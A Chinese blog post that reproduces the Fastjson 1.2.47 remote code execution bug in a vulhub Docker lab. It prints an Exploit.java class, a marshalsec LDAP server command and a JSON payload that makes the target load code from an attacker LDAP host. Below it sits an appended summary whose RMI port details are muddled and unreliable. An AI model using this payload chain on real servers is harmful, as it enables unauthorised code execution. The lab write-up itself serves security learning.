fastjson1.2.47RCE漏洞的复现

31 篇文章 4 订阅
7 篇文章 0 订阅

Fastjson1.2.47RCE漏洞复现

前言

我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发现这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境复现这个Fastjson的RCE漏洞。也就有了这篇文章。

环境准备

为了方便起见,我这次直接选择了vulhub的docker环境,有两种方式可以去获得项目源码
一种是直接在github上down下来
https://github.com/vulhub/vulhub
还有一种是去Gitee上下载,两种并没有什么区别,Gitee是国内的,可能速度快一点?
https://gitee.com/puier/vulhub/
(当然这一步在linux系统中只需要git clone)

复现正文

靶机用的是kali,攻击者用的是windows10

1.启动docker环境,进行环境搭建

我们找到vulhub-master文件夹,在里面启动终端。然后输入cd fastjson/1.2.47-rce/
在这里插入图片描述
进入到目录后,我们输入docker-compose up -d启动docker环境。
在这里插入图片描述
这时候我们看一下本地的8090端口,是否已经启动服务
在这里插入图片描述
我们将网络设置为桥接模式,将虚拟机的网卡桥接到我们的物理网卡上。
在这里插入图片描述
看一下靶机的IP地址
在这里插入图片描述
我们从客户机进行访问,发现能够访问。那么,环境搭建完成。
在这里插入图片描述

2.漏洞利用前的准备

我们要事先准备两个文件分别是Exploit.java以及marshalsec-0.0.3-SNAPSHOT-all.jar
其中Exploit.java的内容如下:
这个EXP的创意源自这位大佬

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
 
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec("touch fanxing");
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
    public static void main(String[] args) throws Exception {
    }
}

将上述提到的两个文件放入同一个文件夹下,然后对Exploit.java进行编译
在这里插入图片描述
然后现在你的新文件夹下应该是这个样子的。
在这里插入图片描述

3.进行漏洞利用

然后我们在刚创建的文件夹下启动cmd,然后用python启动一个web服务

python -m http.server    //(python3)
python -m SimpleHTTPServer  //(python2)

效果大概是这样
在这里插入图片描述
然后我们访问一下本地的8000端口,确认到如下界面,就说明正常了。
在这里插入图片描述
如果之前的配置没有问题,在虚拟机中也可以通过ip:port的形式进行访问
然后还是在该目录下打开一个cmd窗口
输入java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:port/#Exploit用来启动LDAP服务(这里的ip就是你攻击者的ip,port就是刚才python开启的端口)
在这里插入图片描述
然后用brup进行发包
在这里插入图片描述

{
 
    "name":{
 
        "@type":"java.lang.Class",
 
        "val":"com.sun.rowset.JdbcRowSetImpl"
 
    },
 
    "x":{
 
        "@type":"com.sun.rowset.JdbcRowSetImpl",
 
        "dataSourceName":"ldap://192.168.1.5:1389/Exploit",
 
        "autoCommit":true
 
    }
 
 
 
}

上面的ip是攻击者的ip端口是开启LDAP服务的端口。

上面这个exp的原理找我的理解讲就是在name这个键值对中,利用checkautotype()函数将com.sun.rowset.JdbcRowSetImpl存入mappings中,这就导致了我们的第二个键值对在被程序接受的时候,绕过了checkAutoType的黑名单限制,从而拿到了一个com.sun.rowset.JdbcRowSetImpl对象并通过com.sun.rowset.JdbcRowSetImpl对象中的一些方法调用实现命令执行。

利用brup进行发包之后然LDAP服务会有反应。
在这里插入图片描述
去kali中查看命令执行情况。
应为我是用docker搭建的环境,所以所有的RCE都只会在docker内部的环境中得到显现,所以需要先输入docker exec -i 1247-rce_web_1 bash最后一个参数是容器名称
在这里插入图片描述
然后ls一下
在这里插入图片描述
发现他在目录下创建了名为fanxing的目录RCE成功。

总结与反思

在这次的复现过程中,很明显的一个问题就是,我最终并没有去getshell,因为我的这个环境从整体看来是不完整的,仍然被局限在了docker里面,所以拿不了shell。在复现过程中我也曾尝试把docker里的bash拿出来,但都失败了。

根据引用\[1\]和引用\[2\]的内容,可以使用LDAP方法来利用fastjson1.2.47漏洞。在实战情况下,推荐使用LDAP方法进行利用。fastjson1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,但是并不阻挡攻击者的攻击步骤。在fastjson中存在一个全局缓存,当有类进行加载时,如果autoType没有开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。因此,可以通过上传一个带有恶意类的json数据,让它执行并存入缓存,从而绕过漏洞防护机制。\[2\] 具体的漏洞复现步骤如下: 1. 首先,需要启动一个RMI服务器,可以使用以下命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://本机IP:1222/#Exploit" 9999。这个命令将在本地的1222端口上启动一个RMI服务器,并将其绑定到9999端口上。\[3\] 2. 接下来,需要构造一个恶意的json数据,其中包含恶意类的payload。可以使用各种方法来构造这个json数据,例如手动编写或使用工具生成。 3. 将构造好的恶意json数据发送给目标系统,触发fastjson解析该数据的过程。 4. 当fastjson解析恶意json数据时,会尝试从缓存中获取类。由于autoType没有开启,fastjson会尝试从缓存中获取类,如果缓存中有,则直接返回。 5. 通过这种方式,攻击者可以绕过fastjson漏洞防护机制,执行恶意代码。 需要注意的是,漏洞复现仅用于安全研究和测试目的,未经授权的利用可能涉及违法行为,请遵守法律法规。 #### 引用[.reference_title] - *1* *3* [Fastjson命令执行漏洞复现1.2.471.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [fastjson1.2.47漏洞复现](https://blog.csdn.net/m0_63699746/article/details/131551535)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值